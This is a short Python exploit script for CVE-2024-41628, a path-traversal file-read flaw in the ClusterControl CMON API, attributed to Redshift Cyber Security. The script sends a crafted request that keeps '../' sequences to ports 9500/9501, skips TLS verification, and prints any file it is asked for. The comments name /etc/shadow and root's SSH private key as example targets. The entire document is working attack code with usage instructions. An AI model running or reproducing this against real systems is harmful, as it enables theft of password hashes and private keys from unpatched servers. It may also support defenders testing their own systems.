# Simple exploit script developed by Redshift Cyber Security to exploit (CVE-2024-41628) ClusterControl LFI vulnerability.
# The vulnerability affects the CMON API and specifically the RPC and RPC-TLS user interfaces which by default reside on port 9500 and 9501 respectively.
# Due to ClusterControl also typically running as root, any system file can be retrieved (for example: /etc/shadow or /root/.ssh/id_rsa).
# Affected versions of ClusterControl are 1.9.8 before 1.9.8-9778, 2.0.0 before 2.0.0-9779, and 2.1.0 before 2.1.0-9780.
#
# Usage: python3 exploit.py ip port file
# Help: python3 expoit.py -h
# Example: python3 exploit.py 127.0.0.1 9500 /etc/shadow

import requests
import argparse
import urllib3
from argparse import RawTextHelpFormatter

def main():

    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # This is to disable SSL warnings when exploiting via port 9501
    
    parser = argparse.ArgumentParser(description='CVE-2024-41628 ClusterControl LFI developed by Redshift Cyber Security:\n\nSpecify IP address and port of vulnerable target and which file to be retrieved', formatter_class=RawTextHelpFormatter)
    parser.add_argument("ip", help="Specify target IP address")
    parser.add_argument("port", help="Specify port to exploit (default: 9500 or 9501)", type=int)
    parser.add_argument("file", help="Specify file to retrieve (eg., /etc/shadow)")
    args = parser.parse_args()

    if args.port == 9501:
        url = f"https://{args.ip}:{args.port}/../../../../../../../../../{args.file}"
    else:
        url = f"http://{args.ip}:{args.port}/../../../../../../../../../{args.file}"

    session = requests.Session()
    req = requests.Request('GET', url)
    prepped = req.prepare()
    prepped.url = url
    response = session.send(prepped, verify=False)
    print(response.text)

if __name__ == "__main__":
    main()